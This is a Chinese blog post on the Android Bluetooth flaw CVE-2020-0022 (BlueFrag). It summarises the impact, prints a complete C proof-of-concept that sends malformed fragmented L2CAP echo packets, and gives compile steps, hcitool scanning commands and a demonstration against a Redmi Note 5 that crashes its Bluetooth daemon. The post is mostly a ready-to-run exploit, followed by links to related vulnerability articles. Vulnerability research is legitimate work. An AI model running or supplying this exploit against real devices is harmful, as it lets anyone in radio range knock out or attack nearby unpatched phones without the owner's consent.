CVE-2020-0022蓝牙漏洞利用

最新推荐文章于 2024-08-18 21:23:41 发布
最新推荐文章于 2024-08-18 21:23:41 发布
阅读量3.1k 收藏 10
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45926849/article/details/105043550
版权

该漏洞的安全影响如下:

· 在安卓8.0到9.0系统中,在蓝牙开启的情况下,远程攻击者在一定距离范围内可以以蓝牙守护程序的权限静默执行任意代码。整个过程无需用户交互,只需要知道目标设备的蓝牙MAC地址就可以了。而对一些设备,蓝牙的MAC地址可以通过WiFi MAC地址推算出来。该漏洞可能引发个人数据被窃,或用于传播恶意软件(短距离蠕虫)。

· 在安卓10系统中,该漏洞无法被利用,但可能会引发蓝牙守护进程奔溃。

· 低于安卓8.0的版本中也受到该漏洞的影响,但研究人员没有评估该影响。

POC:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/uio.h>


int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data, uint16_t data_length,uint16_t, uint16_t);

int main(int argc,char **argv) {
    bdaddr_t dst_addr;
    if (argc != 2){
      printf("usage: ./poc MAC_ADDR");
    }
    str2ba(argv[1], &dst_addr);
    struct hci_dev_info di;

    // Get HCI Socket
    printf("\nCreating HCI socket...\n");
    int hci_device_id = hci_get_route(NULL);
    int hci_socket = hci_open_dev(hci_device_id);
    if(hci_devinfo(hci_device_id,&di)< 0){
      perror("devinfo");
  exit(1);
    }
    uint16_t hci_handle;
    // -------- L2CAP Socket --------
    // local addr
    struct l2cap_conninfo l2_conninfo;
    int l2_sock;
    struct sockaddr_l2 laddr, raddr;
    laddr.l2_family = AF_BLUETOOTH;
    laddr.l2_bdaddr = di.bdaddr;
    laddr.l2_psm = htobs(0x1001);
    laddr.l2_cid = htobs(0x0040);

    // remote addr
    memset(&raddr, 0, sizeof(raddr));
    raddr.l2_family = AF_BLUETOOTH;
    raddr.l2_bdaddr = dst_addr;

    // create socket 
    printf("\nCreating l2cap socket...\n");
    if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0){
      perror("create l2cap socket");
  exit(1);
    }
    // bind and connect
    bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr));
    if(connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr))<0){
      perror("connect");
  exit(1);
    }
    socklen_t l2_conninfolen = sizeof(l2_conninfo);
    getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &l2_conninfo, &l2_conninfolen);
    hci_handle = l2_conninfo.hci_handle;
    printf("fuck%d", hci_handle);

    // -------- L2CAP Socket --------

    // HCI Connect
    printf("\nCreating a HCI BLE connection...\n");
    printf("\nPrepare to send packet\n");
    uint16_t datalen = 30;
    uint16_t _bs_l2cap_len = htobs(datalen + 4);
    uint16_t _bs_cid = htobs(0x0001);
    uint8_t packet[4 + L2CAP_CMD_HDR_SIZE + datalen + 11];
    memcpy(&packet[0],&_bs_l2cap_len,2);
    memcpy(&packet[2],&_bs_cid,2);
    l2cap_cmd_hdr* cmd = (l2cap_cmd_hdr*) (packet+ 4);
    cmd->code = L2CAP_ECHO_REQ;
    cmd->ident = 0x01;
    cmd->len = htobs(datalen);
    memset(&packet[8], 0x99, datalen+11);
    printf("\nSending first packet\n");
    int i =0 ;
    hci_send_acl_data(hci_socket, hci_handle, &packet[i] , 8 + 4 ,0x0, 8 + 4 ); 
    i+=4;
    printf("\nSending second packet\n");
    hci_send_acl_data(hci_socket, hci_handle, &packet[i] , 12,0x1,12);
    i+=12;
    printf("\nSending third packet\n");
    hci_send_acl_data(hci_socket, hci_handle, &packet[i] , 12,0x1,12); 
    i+=12;
    hci_send_acl_data(hci_socket, hci_handle, &packet[i] , 11,0x1,11);


    printf("\nClosing HCI socket...\n");
    close(hci_socket);
    printf("\nClosing l2cap socket...\n");
    close(l2_sock);
    return 0;
}

int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data, uint16_t data_length, uint16_t PBflag, uint16_t dlen){
    uint8_t type = HCI_ACLDATA_PKT;
    uint16_t BCflag = 0x0000;               // Broadcast flag
    //uint16_t PBflag = 0x0002;               // Packet Boundary flag
    uint16_t flags = ((BCflag << 2) | PBflag) & 0x000F;       
    hci_acl_hdr hd;
    hd.handle = htobs(acl_handle_pack(hci_handle, flags));  
    //hd.dlen = (data_length);
    hd.dlen = dlen;
    struct iovec iv[3];
    int ivn = 3;

    iv[0].iov_base = &type;                 // Type of operation
    iv[0].iov_len = 1;                      // Size of ACL operation flag
    iv[1].iov_base = &hd;                   // Handle info + flags
    iv[1].iov_len = HCI_ACL_HDR_SIZE;       // L2CAP header length + data length
    iv[2].iov_base = data;                  // L2CAP header + data
    iv[2].iov_len = (data_length);          // L2CAP header length + data length

    while (writev(hci_socket, iv, ivn) < 0) {
        if (errno == EAGAIN || errno == EINTR)
            continue;
  perror("writev");
        return -1;
    }
    return 0;
}

今天我们将测试下这个POC, 仅对蓝牙进程造成崩溃.
目标:
红米手机redmi note 5 MIUI 10.8.12.20 Android 8.1.0

我们将POC复制到ubuntu 14.04系统中.

  1. 安装libbluetooth-dev软件包 , sudo apt-get install libbluetooth-dev
  2. 编译poc, gcc -lbluetooth poc.c -o poc
  3. 完成.

搜索蓝牙设备
#hcitool scan
#hcitool lescan (BLE低功耗蓝牙)
在这里插入图片描述
利用poc, .这里我们用来攻击下红米手机,让其蓝牙崩溃.
/poc MAC_ADDR
在这里插入图片描述

攻击前:蓝牙开启正常.
在这里插入图片描述

攻击后: 蓝牙进程崩溃,蓝牙关闭.
在这里插入图片描述

huike008
关注
linux禁用蓝牙模块,[原创]CVE-2020-12351:Linux蓝牙模块拒绝服务漏洞分析
weixin_36244383的博客
05-13 1203
一. 漏洞信息1. 漏洞简述CVE-2020-12351是谷歌安全研究人员在Linux内核中发现的蓝牙安全漏洞。该漏洞位于net/bluetooth/l2cap_core.c,是一个基于堆的类型混淆漏洞。攻击者在蓝牙范围内向目标设备发送恶意L2CAP载荷即可触发该漏洞,引发目标设备蓝牙服务DoS或使攻击者获得目标设备kernel权限的任意代码执行。该漏洞利用过程无需受害者参与交互,因此被称为“零点...
新安卓系统漏洞:仅需目标设备蓝牙MAC地址即可发起RCE攻击
blackorbird的博客
02-10 965
近日,insinuator发布简报称其发现了一个安卓系统蓝牙漏洞。在2019年11月3日,位于德国海德堡的IT安全公司ERNW发现并报告了一个严重漏洞,称影响了Android蓝牙子系统。...
cve-2020-0022:POVE for CVE-2020-0022
04-14
cve-2020-0022 POVE for CVE-2020-0022 用法 gcc poc.c -lbluetooth -o poc poc MAC_ADDR 信息 这个POC在Android 8.1.0上应该是稳定的,一旦它遇到截断的数据包,就会崩溃。 但是它的云非常不稳定,在三星s9上肯定还不稳定。 在树莓派3B上运行poc已通过测试,可以。 在ThinkPad X1C 2018的Windows 10中使用vmware运行ubuntu / arch或在Mac OS X中使用Pd运行ubuntu无法截断代码,不知道为什么。 测试清单 具有Android 8.1.0的OnePlus 5T:稳定。 带有Android 9.0的Samsung s9 plus:不稳定。 搭载Android 9的Nova 3:稳定。
蓝牙App漏洞系列分析之二CVE-2017-0639
12-17 270
蓝牙App漏洞系列分析之二CVE-2017-0639 0x01 漏洞简介 Android本月的安全公告,修复了我们发现的另一个蓝牙App信息泄露漏洞,该漏洞允许攻击者获取 bluetooth用户所拥有的私有文件,绕过了将应用数据与其他应用隔离的操作系统防护功能。 漏洞信息如下: CVE: CVE-2017-0639 BugID: A-35310991 严重性: 高危 漏...
十大知名权威安全漏洞库介绍
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
08-18 1172
CVE(Common Vulnerabilities and Exposures)是公开披露的网络安全漏洞列表。IT人员、安全研究人员查阅CVE获取漏洞的详细信息,进而根据漏洞评分确定漏洞解决的优先级。在CVE中,CVE编号是识别漏洞的唯一标识符。
蓝牙App漏洞系列分析之三CVE-2017-0645
热门推荐
12-17 1万+
蓝牙App漏洞系列分析之三CVE-2017-0645 0x01 漏洞简介 Android 6月的安全公告,同时还修复了我们发现的一个蓝牙 App 提权中危漏洞,该漏洞允许手机本地无权限的恶意程序构造一个仿冒的 Provider ,并获取 Provider 所指向文件的读写权限,可用于写 SD 卡或者蓝牙共享数据库,漏洞详情如下: CVE: CVE-2017-0645 BugI...
Android蓝牙协议栈漏洞剖析
内核工匠
09-30 928
一.背景介绍蓝牙协议相对于其他通信协议如WIFI(802.11)、传统TCP/IP议协等来说,更为复杂,目前蓝牙核心规范(5.3)高达3085页。蓝牙的这种复杂性使得对蓝牙的各个协议的实现进行安全测试与审计变得相对困难,从而导致协议的实现和使用容易出现较多的安全漏洞。但是从另一方面来说,它的复杂性也会要求研究员或攻击者进行漏洞挖掘的技术门槛变得相对更高,需要突破的难点也会更多。图1 蓝牙核心规范...
蓝牙新漏洞,黑客可以轻松控制你的手机,全球数亿台设备受影响
w3cschools的博客
09-16 1032
负责监督蓝牙标准开发的组织蓝牙SIG今天发表声明,通知用户和供应商一个新报告的未修补漏洞,该漏洞可能会影响全球数亿台设备,甚至影响打开蓝牙功能的手机,黑客还可以轻松控制你的手机。 该漏洞由两个独立的学术研究团队独立发现,存在于支持基本速率/增强数据速率(BR / EDR)和蓝牙低功耗(BLE)标准的设备的交叉传输密钥派生(CTKD)中。 交叉传输密钥派生(CTKD)是一个蓝牙组件,负责在将两个蓝牙设备(也称为“双模式”设备)配对在一起时协商身份验证密钥。 该漏洞 被称为“ BLURtooth”并被
bias:蓝牙模拟攻击(BIAS)[CVE 2020-10135]
03-12
**BIAS:蓝牙模拟攻击(Bluetooth Impersonation Attacks, CVE-2020-10135)** 蓝牙技术是一种广泛使用的无线通信标准,它允许设备之间进行短距离的数据交换,如手机、电脑、耳机等。然而,随着技术的发展,蓝牙的...
knob:蓝牙BREDR和BLE的蓝牙密钥协商(KNOB)攻击[CVE-2019-9506]
05-14
CVE-2019-9506是这种攻击的CVE(Common Vulnerabilities and Exposures)编号,用于识别特定的安全漏洞。 蓝牙协议在设备之间建立连接时,通常会进行密钥协商以确保通信的安全性。KNOB攻击利用了蓝牙协议中的一个...
NFC竟也存在高危漏洞?看他如何分析(CVE-2021-0870)
Moyun_vackbot的博客
01-21 3913
概述 NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。 CVE-2021-0870是一枚NFC中的RCE高危漏洞,2021年10月漏洞通告中显示已被修复https://source.android.com/security/bulletin/2021-10-01。漏洞成因是RW_SetActivatedTagType 可以通过将NFC的TCB(tag c
【安全资讯】蓝牙爆出七个严重漏洞,攻击者可假冒合法设备
翼安研习社的博客
05-28 257
作者|安全牛 来源|安全内参 发布时间|2021-05-27 近日,美国国家情报系统研究人员(ANSSI)在蓝牙Bluetooth Core和Mesh Profile规范中发现多个安全漏洞,攻击者可利用这些漏洞在配对过程中冒充合法设备,并发起中间人(MitM)攻击。 蓝牙核心和网格配置文件规范定义了蓝牙设备相互通信以及使用低能耗无线蓝牙设备所需的要求,以实现可互操作的网格网络解决方案。 负责监督蓝牙标准开发的蓝牙特别利益组织(Bluetooth Special Interest Group,简称Blu.
android蓝牙通信_Android蓝牙子系统“BlueFrag”漏洞分析(CVE20200022
weixin_39762478的博客
11-27 601
更多安全资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)一、漏洞背景2020年2月,Android安全公告中披露并修复了一个严重漏洞,漏洞编号为CVE-2020-0022,又称BlueFrag,可影响Android蓝牙子系统。该漏洞是一个远程代码执行漏洞,出现在Bluedroid蓝牙协议栈的HCI层,当无线模块处于活动状态时,攻击...
无线安全[蓝牙攻防]
0x00的博客
01-14 587
中间人攻击 风险描述: 指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。 危害描述: 截获通信数据,获取敏感信息内容。 修复建议: 加载证书来防止中间人攻击。 测试案例: 如果你想把抓好的包带回家慢慢整,你可以简单的包抓取的内容输出到某个目录下 ubertooth-...
android蓝牙固件,BlueFrag:Android 蓝牙零交互远程代码执行漏洞分析
weixin_33602725的博客
05-29 999
如今,蓝牙已成为移动设备不可或缺的一部分,智能手机与智能手表和无线耳机互连。默认情况下,大多数设备都配置为接受来自附近任何未经身份验证的设备的蓝牙连接,蓝牙数据包由蓝牙芯片(也称为控制器)处理,然后传递到主机(Android,Linux等),芯片上的固件和主机蓝牙子系统都是远程代码执行(RCE)攻击的目标。大多数经典蓝牙实现中可用的一项函数是通过蓝牙ping应答,攻击者只需知道设备的蓝牙地址即可。...
SweynTooth爆出最新低功耗蓝牙漏洞,多家知名蓝牙芯片榜上有名
weixin_42583147的博客
03-07 1400
-------------------------------------------------------------------------------------------------------- 文章版权归为微信公众号 无线技术联盟,转载请注明出处. 作者:XCODER ------------------------------------------------------...
蓝牙App漏洞系列分析之一CVE-2017-0601
12-17 380
蓝牙App漏洞系列分析之一CVE-2017-0601 0x01 概要 2017年5月的 Android 安全公告修复了我们提交的一个蓝牙提权中危漏洞,这个漏洞尽管简单,但比较有意思,能够使本地恶意 App 绕过用户交互,使用户强制接收外部传入的蓝牙文件。漏洞概要如下: CVE: CVE-2017-0601 BugID: A-35258579 严重性: 中 影响的 Goog...
蓝牙概述以及攻击面
Kevin's Blog
03-22 796
文章目录一、简述蓝牙攻击面 蓝牙以其智能化、低功耗、高连接速度、低成本等特性,广泛用于智能家居、消费调子、智慧医疗、智能汽车、智能穿戴设备和智能建筑设备在内的所有物联网智能设备中…… 一、简述 蓝牙攻击面 ...
android 9 蓝牙源码_CVE-2017-13258 Android 蓝牙BNEP漏洞分析
weixin_29217235的博客
12-29 289
本文为看雪论坛优秀文章看雪论坛作者ID:ID蝴蝶1、概述三月份的Android安全公告中披露了多个蓝牙方面的系统层漏洞,漏洞多出现在BNEP中,涉及的源码版本为5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1,覆盖范围较广。本文以CVE-2017-13258漏洞为例进行分析,该漏洞类型为内存信息泄露,危害等级为High。2、协议简介>>&gt...
FusionAuth 1.10 RCE漏洞(CVE-2020-7799):预览功能漏洞利用
CVE-2020-7799,全称为"CVE-2020-7799:FusionAuth 1.10 Remote Code Execution (RCE)漏洞",影响的是FusionAuth 1.10版本。该漏洞是一种严重的安全问题,涉及到远程代码执行,这意味着攻击者可以通过利用此漏洞在 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huike008

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值